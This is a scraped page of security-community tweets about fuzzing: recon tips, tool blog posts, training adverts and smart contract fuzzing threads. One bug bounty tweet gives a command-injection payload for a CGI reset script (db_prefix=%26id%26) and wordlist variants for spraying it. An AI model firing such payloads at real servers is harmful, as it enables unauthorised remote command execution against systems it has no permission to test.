Yasser | Skidrow 🇸🇦(@firfox20) 's Twitter Profile Photo

When You Recon for Old Urls, and there is to much output you Can use , cut or awk to print only found paths then export them as a fuzzing wordlist .txt and test them , found me a file upload :)

When You Recon for Old Urls,  and there is to much output you Can use , cut or awk to print only found paths  then export them as a fuzzing wordlist .txt  and  test them ,  found me a file upload :)
#bugbountytips
account_circle
0sman(@abdallah_osman4) 's Twitter Profile Photo

when I test on one of my private targets on h1 I found this site that have an service for administrators of the site but I try some techniques after some fuzzing I found this endpoint /admin/index.html with a white page
Can us help me Godfather Orwa 🇯🇴 🇸🇦 ROOD | GOAT

when I test on one of my private targets on h1 I found this site that have an service for administrators of the site  but I try some techniques after some fuzzing I found this endpoint /admin/index.html with a white page
Can us help me @GodfatherOrwa @0x_rood
account_circle
b33f | 🇺🇦✊(@FuzzySec) 's Twitter Profile Photo

I wrote a post on coverage guided fuzzing for native Android libraries (using Frida & Radamsa), check it out on KnifeCoat 🔪🧥

knifecoat.com/Posts/Coverage…

I wrote a post on coverage guided fuzzing for native Android libraries (using Frida & Radamsa), check it out on KnifeCoat 🔪🧥

knifecoat.com/Posts/Coverage…
account_circle
Hack The Box(@hackthebox_eu) 's Twitter Profile Photo

What's all the FUZZ about? 😵‍💫
A new Academy module is here! Dive into the powerful testing technique and learn how to use it to spot critical issues in software. Start now: okt.to/J9u3ps
Academy

What's all the FUZZ about? 😵‍💫
A new #HTB Academy module is here! Dive into the powerful testing technique and learn how to use it to spot critical issues in software. Start now: okt.to/J9u3ps
#HackTheBox #HTBAcademy #CyberSecurity #Fuzzing
account_circle
Will Gates(@WllGates) 's Twitter Profile Photo

😍story of very quick RCE

Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

You can to add this paths for ur wordlist

cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

cgi-bin/reset.cgi?db_prefix=%26id%26

fuzzing as well

cgi-bin/FUZZ.cgi?FUZZ=%26id%26

credit: Godfather Orwa 🇯🇴

😍story of very quick RCE 

Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

You can to add this paths for ur wordlist 

cgi-bin/dmt/reset.cgi?db_prefix=%26id%26

cgi-bin/reset.cgi?db_prefix=%26id%26

fuzzing as well 

cgi-bin/FUZZ.cgi?FUZZ=%26id%26

credit: @GodfatherOrwa 

#sec
account_circle
Eito Miyamura ♨️ | GPU-EVM, 100x EVM(@Eito_Miyamura) 's Twitter Profile Photo

💡Unit test is a constant policy function test for bugs X~I(x=c)

Fuzzing is a pseudo-uniform policy (+ mut. strategies) X~U

One exciting application of GPU-EVM by GatlingX ♨️ | GPU-EVM, 100x EVM is training RL-optimised policy function that prunes search spaces intelligently to where the bugs are

💡Unit test is a constant policy function test for bugs X~I(x=c)

Fuzzing is a pseudo-uniform policy (+ mut. strategies) X~U

One exciting application of GPU-EVM by @Gatling_X is training RL-optimised policy function that prunes search spaces intelligently to where the bugs are
account_circle
M@ňăv(@a_s_h_Hunter) 's Twitter Profile Photo

fuzzing types n tricks.
From this thread, you will get to know types of fuzzing in smart contracts. Let's begin

Two types of fuzzing
1. Stateful fuzzing.
2. Stateless fuzzing.

account_circle
Black Hat(@BlackHatEvents) 's Twitter Profile Photo

In Trainings course “Android Userland & Kernel Fuzzing and Exploitation' explore Android security with our designed for all skill levels. Learn about vulnerabilities and their exploitation with our comprehensive curriculum. Reg now >> bit.ly/3wVg53g

In #BHUSA Trainings course “Android Userland & Kernel Fuzzing and Exploitation' explore Android security with our designed for all skill levels. Learn about vulnerabilities and their exploitation with our comprehensive curriculum. Reg now >> bit.ly/3wVg53g
account_circle
Alex the Entreprenerd(@GalloDaSballo) 's Twitter Profile Photo

How can you use Inductive Reasoning to prove global properties, without using Global Variables?

How to make Mocks work with Mainnet Fuzzing?

How does eBTC use Continous Fuzzing to check their properties against their mainnet deployment?

Workshop by lourens!

How can you use Inductive Reasoning to prove global properties, without using Global Variables?

How to make Mocks work with Mainnet Fuzzing?

How does eBTC use Continous Fuzzing to check their properties against their mainnet deployment?

Workshop by @LourensLinde!
account_circle
Vasileiadis A. (Cyberkid)(@Anastasis_King) 's Twitter Profile Photo

📱Mobile Hacking Cheatsheets

📝Android and iOS pentesting, forensics, debugging and fuzzing cheatsheets

🔗Link: github.com/randorisec/Mob…

🔖

📱Mobile Hacking Cheatsheets

📝Android and iOS pentesting, forensics, debugging and fuzzing cheatsheets

🔗Link: github.com/randorisec/Mob…

🔖#infosec #cybersecurity #hacking #pentesting #security
account_circle
Mai 💾(@0xMai) 's Twitter Profile Photo

Integration testing, fuzzing, time boxed audits, public audit competitions, and of course stateful fuzzing with ToB. The ability to bombard billions of different permutations at the contracts to try to break the protocol is virtually impossible otherwise.

2/3

account_circle